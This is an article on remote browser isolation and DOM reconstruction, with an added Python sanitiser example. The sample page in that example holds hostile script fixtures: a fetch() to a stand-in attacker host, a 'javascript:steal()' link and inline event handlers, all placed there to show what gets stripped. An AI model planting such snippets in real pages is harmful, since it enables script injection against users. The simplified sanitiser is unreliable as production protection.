Browsers are essential, but because they were designed before security, privacy and regulatory compliance were critical factors, they are an easy target for cybercriminals looking to breach network defenses.
In response, companies have tried to mitigate browsers' vulnerabilities by maintaining allowlists and blocklists of URLs and DNS addresses, as well as using signature technology for data files and executables.
Keeping these controls up to date, however, is always a game of catch-up, and they cannot prevent zero-day attacks. Moreover, they can restrict or interfere with legitimate browser activities.
A more effective alternative -- and one gaining traction -- is remote browser isolation, a zero-trust approach that uses physical isolation to separate users' browsing activity from their device.
How remote browser isolation works
Remote browser isolation differs from local browser isolation, which uses sandboxing at either the app or OS level to separate the browser from a device. Local browser isolation is both resource- and administration-intensive, and it requires specific hardware and software components.
Remote browser isolation, by contrast, is primarily delivered as a service by a third-party provider, although some enterprises run it on a separate server attached to the corporate network. When users request a webpage -- whether via desktop or mobile browser -- the service creates an isolated browser session in a disposable containerized instance. The page is presented on users' browsers as a rendering, commonly as pixels over an HTML5 canvas.
Keyboard and mouse inputs are transmitted to the isolation service via an encrypted channel, and any resulting updates to the remote browser webpage are sent back to the endpoint device in the same way. Because no active content is downloaded, any hidden malware or viruses in the page are unable to reach the endpoint.
This approach completely isolates users' browsing activities from enterprise endpoints and networks, thereby providing protection from both known and unknown threats. Any threat risk is moved to the remote server sessions, which can be reset to a known-good state on every new browsing session, tab or page request. Remote browser isolation benefits the user's overall experience. It enables users to access websites without worrying about downloading malicious webpages even if their browsers are outdated, vulnerable or have insecure plugins installed.
Costs an issue, but remote browser isolation benefits are widespread
The main disadvantage with remote browser isolation is cost. Pixel pushing is resource-intensive and therefore expensive, and many services are built on centralized foundations that don't scale as well as distributed architectures. Remote browser isolation also requires large amounts of bandwidth to avoid latency issues. Document Object Model (DOM) reconstruction is an alternative to pixel pushing. With DOM reconstruction, a page's HTML, CSS and scripts are inspected, cleaned and repacked before being forwarded to the endpoint. However, malicious code can still reach the endpoint if the cleaning step fails to detect it, and a page's layout or functionality can also break.
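The DOM reconstruction step described above, as an added example that is not part of the original article or of any vendor's product: a small Python rebuilder that parses a constructed sample page, keeps only an allowlist of tags and attributes, drops everything else (script and iframe elements, `on*` event handlers, `javascript:` URLs, comments), and reports both what it removed and whether the page's behaviour depended on removed content. The sample page, the allowlists and the `reconstruct` function are assumptions made for this example.

```python
"""Allowlist-based DOM reconstruction (constructed example, not a product's code).

The rebuilder re-emits only known-safe tags and attributes from a page, so the
endpoint receives rebuilt markup rather than the original.  It also records what
was dropped, which is exactly where the two caveats from the article surface:
anything the rebuilder fails to recognise as active content would be forwarded,
and anything it drops may be something the page needed to work.
"""
from dataclasses import dataclass, field
from html import escape
from html.parser import HTMLParser

# Assumed allowlists for the example; a real service would carry far longer ones.
ALLOWED_TAGS = {"html", "head", "title", "body", "h1", "h2", "p", "a", "ul", "li",
                "div", "span", "form", "input", "button", "img", "br"}
VOID_TAGS = {"br", "img", "input"}          # never receive an end tag
ALLOWED_ATTRS = {"href", "src", "alt", "id", "class", "type", "name", "value"}
URL_ATTRS = {"href", "src"}
SAFE_URL_PREFIXES = ("http://", "https://", "/", "#")

# Constructed sample page: mixes legitimate content with script, an inline
# event handler, a javascript: link and an embedded frame.
SAMPLE_PAGE = """<html><head><title>Orders</title>
<script>window.pwn = fetch("https://evil.test/x")</script></head>
<body onload="track()">
<h1>Orders</h1>
<p>Balance: <span id="bal">42</span></p>
<a href="javascript:steal()">Export</a>
<iframe src="https://ads.test/f"></iframe>
<form><input name="q" type="text"><button onclick="submitOrder()">Submit</button></form>
</body></html>"""


@dataclass
class Reconstruction:
    html: str                                   # rebuilt markup sent to the endpoint
    removed: list = field(default_factory=list)  # audit trail of dropped items
    functionality_lost: bool = False             # page relied on something dropped


class DomRebuilder(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.removed = []
        self.skip_stack = []   # open tags of elements being dropped wholesale

    def handle_starttag(self, tag, attrs):
        # Inside a dropped element, or an element not on the allowlist: drop it
        # (and, for non-void tags, everything up to its matching end tag).
        if self.skip_stack or tag not in ALLOWED_TAGS:
            self.removed.append(f"<{tag}>")
            if tag not in VOID_TAGS:
                self.skip_stack.append(tag)
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            if name.startswith("on") or name not in ALLOWED_ATTRS:
                self.removed.append(f"{tag}@{name}")
                continue
            if name in URL_ATTRS and not value.strip().lower().startswith(SAFE_URL_PREFIXES):
                self.removed.append(f"{tag}@{name}={value}")
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if self.skip_stack:
            if tag in self.skip_stack:          # close the dropped element
                while self.skip_stack.pop() != tag:
                    pass
            return
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        # Text inside a dropped element (e.g. script source) is never emitted;
        # other text is re-escaped so entities cannot smuggle markup through.
        if not self.skip_stack:
            self.out.append(escape(data))

    # Comments and declarations are simply not re-emitted (HTMLParser default).


def reconstruct(html: str) -> Reconstruction:
    """Rebuild `html` from the allowlist and report what was dropped."""
    rebuilder = DomRebuilder()
    rebuilder.feed(html)
    rebuilder.close()
    # If a script or inline handler was removed, the page's behaviour changed.
    lost = any(item == "<script>" or "@on" in item for item in rebuilder.removed)
    return Reconstruction("".join(rebuilder.out), rebuilder.removed, lost)


if __name__ == "__main__":
    result = reconstruct(SAMPLE_PAGE)
    print(result.html)
    print("removed:", result.removed)
    print("functionality lost:", result.functionality_lost)
```

The allowlist is the deliberate design choice: a rebuilder that drops everything it does not recognise fails toward breakage rather than toward forwarding unknown active content, which is the safer side of the trade-off the article describes. The sample run shows both caveats at once: the `removed` list is the detection record an operator would want to review, and `functionality_lost` flags that the Submit button no longer has a handler, so the order form is now broken for the user. Pixel pushing avoids both problems, at the cost described above, because no markup crosses the channel at all.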
Adopting remote browser isolation can benefit an organization's overall enterprise cybersecurity strategy as it lets users access the internet, while mitigating some of the inherent risks. As a zero-trust technology, it gives companies an obvious choice in some situations. It takes less time to manage than traditional allowlists and blocklists, especially for those products that don't require agents to be installed on users' devices. Costs, meanwhile, can be addressed by, for example, deploying remote browser isolation only to high-risk users and C-level employees.
Before deciding on a service, companies should thoroughly research potential remote isolation vendors and determine how their services are implemented, what their scalability is, and whether they support specific plugins and remote viewers for certain file types.
If employees aren't offered relatively seamless UX, they may well try alternative -- and riskier -- ways to access the internet for information they need.